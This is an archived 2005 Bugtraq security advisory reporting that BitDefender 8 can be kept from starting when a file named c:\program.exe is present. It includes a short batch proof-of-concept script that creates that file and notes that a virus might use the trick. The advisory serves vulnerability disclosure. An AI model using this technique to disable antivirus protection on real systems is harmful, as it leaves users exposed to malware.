lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: 23 Apr 2005 03:03:10 -0000
From: SecuBox fRoGGz <unsecure@...teme.com>
To: bugtraq@...urityfocus.com
Subject: BitDefender 8 - Race condition vulnerability




-----------------------------
Product: BitDefender
Version: 8
Tested on: Windows 2000 SP4
Vulnerability: Race condition
-----------------------------

BACKGROUND
----------
BitDefender ensures the most advanced antivirus protection, as well as data 
confidentiality, active content control and Internet filtering.
A powerful antivirus tool with features that best meet your security needs.
Source: www.bitdefender.com


VULNERABLE PRODUCTS
-------------------
BitDefender 8 Professional Plus
BitDefender 8 Standard Edition
Maybe other...


RACE CONDITION
--------------
At Windows startup, when a file named: program.exe is found on c:\ 
Windows send an alert message, messagebox controls are:
2 buttons -> "Rename" or "Ignore"
1 checkbox -> [X] Do not do this verification on startup. 
(Sorry, haven't got the exact english message)

At this moment, BitDefender can't start, so we have a session without virus protection.


PROOF OF CONCEPT
----------------
Open your notepad.exe and paste this batch script.

@echo off
echo #-------------------------------------------------------#
echo [   SecuBox - Proof of Concept        (04.12.2005)      ]
echo #-------------------------------------------------------#
echo # This script just create the race condition.           #
echo # It might be use by virus.                             #
echo # Now, reboot your computer and watch your BitDef !     #
echo #-------------------------------------------------------#
echo # Be carefull, for virus protection need another reboot #
echo # Closing your Windows session is not sufficient !      #
echo #-------------------------------------------------------#
echo BitDef PoC > c:\program.exe
pause
exit


EXPLOITATION
------------
Save this batch script as TEST.BAT and try it.


VENDOR STATUS
-------------
Vendor have been contacted but no reply ...


CREDITS
----------------------
SecuBox Labs - fRoGGz
unsecure@...teme.com
----------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ